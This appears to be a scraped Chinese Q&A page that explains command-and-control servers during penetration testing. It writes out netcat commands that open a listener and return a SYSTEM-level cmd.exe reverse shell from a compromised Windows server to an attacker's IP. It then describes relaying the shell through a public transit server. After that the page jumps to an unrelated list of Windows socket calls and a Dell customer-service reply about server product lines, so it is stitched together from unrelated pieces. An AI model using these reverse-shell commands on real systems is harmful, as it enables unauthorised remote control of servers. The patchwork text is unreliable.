服务器的全称是
Command
and
Control
Server,翻译过来就是命令和控制服务器
通常在做渗透测试的时候,在拿到一个
webshell
的时候,需要对服务器进行提权操作,如果是一台
windows
的服务器,提权的时候通常是利用本地提权漏洞的
exp
进行溢出提权,有些
exp
可以直接在后面加参数,溢出成功之后执行参数中的命令。
而有的
exp
溢出成功之后是返回一个
system
权限的
cmd,这时就需要将低权限的
cmd
shell
反弹回本地,这里用
nc
在本地执行:nc
-vv
-lp
3333
上述命令的意思是在本地监听一个
3333
端口等待连接,假设电脑
IP
是公网的,并且
IP
为
114.114.114.114,然后在目标服务器就可以执行:nc
114.114.114.114
3333
-e
cmd.exe
上面的命令就可以把远程服务器的服务器权限的
cmd
shell
返回到本地,这时你就可以通过
nc
建立的这个
shell
进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的
C&C
服务器。
扩展资料:
C&C
服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。
通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网
IP
地址是:111.111.111.111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。
这里中转服务器的作用就是本地内网的主机监听的端口映射到公网
IP
的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。
这是WINDOWS的连网代码吧?WSDstartup初始
socket创建套节字
bing监听
sendto发送
sockaddr_in IP结构体
尊敬的用户您好:首先非常感谢您关注我们,我们将竭诚为您服务。您所指的R系列是侧重于扩展性和卓越性价比,适用于中小企业;
而C系列则侧重吞吐量和超密集型高性能,适合于大企业,C系列服务器,比R系列支持的内存要多,内部更密集,价格也相对高一些,目前用户不能在网上下单,只能通过高级经销商和项目大订单采购。C系列等于是介于R系列机架式和M系列刀片式服务器中间。
戴尔衷心感谢您的支持,祝您生活愉快!
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)